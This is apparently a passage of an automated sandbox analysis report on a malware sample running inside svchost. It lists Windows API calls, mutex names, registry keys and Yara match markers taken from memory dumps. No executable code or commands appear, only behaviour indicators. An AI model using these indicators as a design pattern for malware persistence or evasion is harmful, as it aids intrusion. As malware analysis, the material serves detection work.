                                                                                                                                                                                                              • Part of subcall function 02C76570: IsBadWritePtr.KERNEL32(?,00000004), ref: 02C7667E
                                                                                                                                                                                                            • RtlImageNtHeader.NTDLL(00000000), ref: 02C9386E
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 02C93882
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,?,?,02C84480), ref: 02C93893
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 02C938A3
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02C84480), ref: 02C938E0
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,02C84480), ref: 02C938E3
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02C84480), ref: 02C938F0
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,02C84480), ref: 02C938F3
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$FileHandle$FreeValidate$AddressAllocateCloseCountCreateHeaderImageInformationModuleProcReadSizeTickWritememset
                                                                                                                                                                                                            • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FindWindowW.USER32(SunAwtFrame,02CB83E0), ref: 02C8EAE1
                                                                                                                                                                                                            • FindWindowW.USER32(SunAwtFrame,02CB8418), ref: 02C8EAF1
                                                                                                                                                                                                            • FindWindowW.USER32(SunAwtFrame,02CB8448), ref: 02C8EB01
                                                                                                                                                                                                            • FindWindowW.USER32(SunAwtFrame,02CB8468), ref: 02C8EB11
                                                                                                                                                                                                            • FindWindowW.USER32(SunAwtDialog,02CB83E0), ref: 02C8EB21
                                                                                                                                                                                                            • FindWindowW.USER32(SunAwtDialog,02CB8418), ref: 02C8EB31
                                                                                                                                                                                                            • FindWindowW.USER32(SunAwtDialog,02CB8448), ref: 02C8EB41
                                                                                                                                                                                                            • FindWindowW.USER32(SunAwtDialog,02CB8468), ref: 02C8EB51
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FindWindow
                                                                                                                                                                                                            • String ID: SunAwtDialog$SunAwtFrame
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 02C8A32C
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C8A335
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8A349
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8A35B
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da3b2), ref: 02C8A366
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,6d1da3b2,ALPHA), ref: 02C8A380
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C8A386
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                            • String ID: 6d1da3b2$ALPHA$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$P0Wu
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C918FC
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C91905
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C91919
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C9192B
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA718), ref: 02C91936
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,6D1DA718,RFK), ref: 02C91950
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C91956
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                            • String ID: 6D1DA718$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$P0Wu$RFK
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C8E8BC
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C8E8C5
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8E8D9
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8E8EB
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da208), ref: 02C8E8F6
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,6d1da208,HANDY), ref: 02C8E910
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C8E916
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                            • String ID: 6d1da208$HANDY$Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}$P0Wu
                                                                                                                                                                                                            • API String ID: 4280258085-2176744899
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7F114
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02C7F12C
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C7F12F
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7F13C
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C7F13F
                                                                                                                                                                                                            • InternetQueryOptionA.WININET(?,00000022,00000000,-02CBD804), ref: 02C7F15C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000014), ref: 02C7F179
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C7F180
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7F190
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7F1D5
                                                                                                                                                                                                            • memcpy.MSVCRT(?,00000000,?,?,00000000,?), ref: 02C7F1E9
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Processmemset$AllocFreeInternetOptionQueryValidatememcpy
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3911349929-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,-0597B008,00000000,00000000,?,?,?,?), ref: 02C7E324
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C7E32B
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C7E33B
                                                                                                                                                                                                            • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?), ref: 02C7E346
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(?,00000000,00000000,?,?,02CB36B4,?,02CB3DE4,-0597B008,00000000,00000000,?), ref: 02C7E40E
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C7E415
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(?,00000000), ref: 02C7E421
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C7E428
                                                                                                                                                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,02CB3DE4,-0597B008,00000000,00000000,?), ref: 02C7E44E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,-0597B008,00000000,00000000,?,?,?,?), ref: 02C7E47A
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C7E47D
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C7E48A
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C7E48D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$FreeValidatememcpy$Allocmemset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1948005343-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C76B83
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C76B9B
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000101,?,?,?,?,?,?,7556F380), ref: 02C76BBC
                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000104,00000000,00000001,?,00000104,?,?,?,?,?,7556F380), ref: 02C76BE2
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,7556F380), ref: 02C76C6D
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,7556F380), ref: 02C76C74
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C76C83
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,7556F380), ref: 02C76CB3
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset$Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                            • String ID: software\microsoft
                                                                                                                                                                                                            • API String ID: 4158279268-3673152959
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C823A7
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 02C823B9
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(user!965543!09C06683,software\microsoft,00000000,00000102,02C84A6F,?,02C84A6F), ref: 02C823D3
                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(02C84A6F,92F35CFEa,00000000,00000004,00000004,00000004,02C84A6F), ref: 02C823F0
                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(?), ref: 02C823FA
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02C82404
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AdminCloseCountFlushOpenTickUserValue
                                                                                                                                                                                                            • String ID: 92F35CFEa$user!965543!09C06683$software\microsoft
                                                                                                                                                                                                            • API String ID: 287100044-273523247
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,00000000), ref: 02C7EBEA
                                                                                                                                                                                                            • memcpy.MSVCRT(00000000,?,?,?,?,?,00001100,?,?,?,?,?,?,?,?,?), ref: 02C7EC9A
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C7ECB6
                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,?), ref: 02C7ECC5
                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,?,?,?,Content-Length,?), ref: 02C7ED1C
                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 02C7ED3D
                                                                                                                                                                                                            • memcpy.MSVCRT(?,?,?), ref: 02C7EDBF
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memcpy$_snprintf
                                                                                                                                                                                                            • String ID: 0$%x$Content-Length
                                                                                                                                                                                                            • API String ID: 4125937431-3838797520
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C75110
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7513C
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C75163
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C75184
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(000002C0,000003E8), ref: 02C751B4
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(000002C0), ref: 02C751D5
                                                                                                                                                                                                            • SetLastError.KERNEL32(?), ref: 02C751EE
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
                                                                                                                                                                                                            • String ID: P0Wu
                                                                                                                                                                                                            • API String ID: 2971961948-465009422
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C75218
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C75249
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C75275
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7529C
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(000002C0,000003E8), ref: 02C752CD
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(000002C0), ref: 02C752EE
                                                                                                                                                                                                            • SetLastError.KERNEL32(?), ref: 02C752F8
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
                                                                                                                                                                                                            • String ID: P0Wu
                                                                                                                                                                                                            • API String ID: 2971961948-465009422
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C80710
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C8072E
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,-80000001,?,?,?,?,?,?,0000001C,00000000), ref: 02C807CD
                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(-80000001,92F35DE2a,00000000,00000001,?,00000104,?,?,?,?,0000001C,00000000), ref: 02C807EF
                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(-80000001,?,?,?,?,0000001C,00000000), ref: 02C807FD
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(-80000001,?,?,?,?,0000001C,00000000), ref: 02C80810
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset$CloseFlushOpenValue
                                                                                                                                                                                                            • String ID: 92F35DE2a$software\microsoft
                                                                                                                                                                                                            • API String ID: 2470402893-1434664175
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\private\), ref: 02C8AB49
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8AAF0,00000000,00000000,00000000), ref: 02C8AB96
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\public\), ref: 02C8ABAE
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C8AAD0,00000000,00000000,00000000), ref: 02C8ABF2
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8AC0A
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8AC1B
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateHandleThread$CloseInformation
                                                                                                                                                                                                            • String ID: \private\$\public\
                                                                                                                                                                                                            • API String ID: 677819612-281496920
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 02C7D21B
                                                                                                                                                                                                            • GetLastActivePopup.USER32(?), ref: 02C7D229
                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000005), ref: 02C7D243
                                                                                                                                                                                                            • GetWindow.USER32(00000000), ref: 02C7D246
                                                                                                                                                                                                            • GetWindowInfo.USER32(00000000,?), ref: 02C7D25C
                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000004), ref: 02C7D265
                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000003), ref: 02C7D29E
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$ActiveInfoLastLongPopup
                                                                                                                                                                                                            • String ID: <
                                                                                                                                                                                                            • API String ID: 3748940024-4251816714
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,02C7C8E0,00000000,00000000,00000000), ref: 02C7C924
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000,?,?,02C78DCA,?,?,?,?,02C78F99,00000000,?,?,?,?,02C78500), ref: 02C7C93C
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,02C78DCA,?,?,?,?,02C78F99,00000000,?,?,?,?,02C78500,?), ref: 02C7C94D
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,02C78DCA,?,?,?,?,02C78F99,00000000,?,?,?,?,02C78500), ref: 02C7C95C
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C7C990
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02C7C997
                                                                                                                                                                                                            • PostMessageA.USER32(?,00000215,00000000,00000000), ref: 02C7C9AB
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$CloseCreateInformationMessageMutexObjectPostReleaseSingleThreadWaitWindow
                                                                                                                                                                                                            • String ID: P0Wu
                                                                                                                                                                                                            • API String ID: 731183410-465009422
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: callocexitfree
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3367576030-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: free$malloc$CloseFileHandleReadselect
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 158848325-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 02C9EAA0: select.WS2_32(?,?,00000000,00000000,?), ref: 02C9EB27
                                                                                                                                                                                                              • Part of subcall function 02C9EAA0: __WSAFDIsSet.WS2_32(?,?), ref: 02C9EB58
                                                                                                                                                                                                              • Part of subcall function 02C9EAA0: recv.WS2_32(?,?,00000005,00000000), ref: 02C9EB7B
                                                                                                                                                                                                              • Part of subcall function 02C9EAA0: recv.WS2_32(?,?,00000004,00000000), ref: 02C9EB9D
                                                                                                                                                                                                              • Part of subcall function 02C9EAA0: socket.WS2_32(00000002,00000001,00000000), ref: 02C9EBB6
                                                                                                                                                                                                              • Part of subcall function 02C9EAA0: setsockopt.WS2_32(00000000,00000006,00000001,00000001,00000004), ref: 02C9EBD2
                                                                                                                                                                                                            • malloc.MSVCRT ref: 02C988B3
                                                                                                                                                                                                            • GetSystemTime.KERNEL32(?), ref: 02C98987
                                                                                                                                                                                                            • GetSystemTime.KERNEL32(?), ref: 02C989D2
                                                                                                                                                                                                            • GetSystemTime.KERNEL32(00000000,?), ref: 02C98A64
                                                                                                                                                                                                            • GetSystemTime.KERNEL32(user!965543!09C06683,?), ref: 02C98AB2
                                                                                                                                                                                                            • free.MSVCRT ref: 02C98B6F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: SystemTime$recv$freemallocselectsetsockoptsocket
                                                                                                                                                                                                            • String ID: user!965543!09C06683
                                                                                                                                                                                                            • API String ID: 2153857484-1221987485
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C899E7
                                                                                                                                                                                                            • GetVersionExW.KERNEL32(?), ref: 02C89A0A
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02C89ADB
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02C89AEC
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000), ref: 02C89AFC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
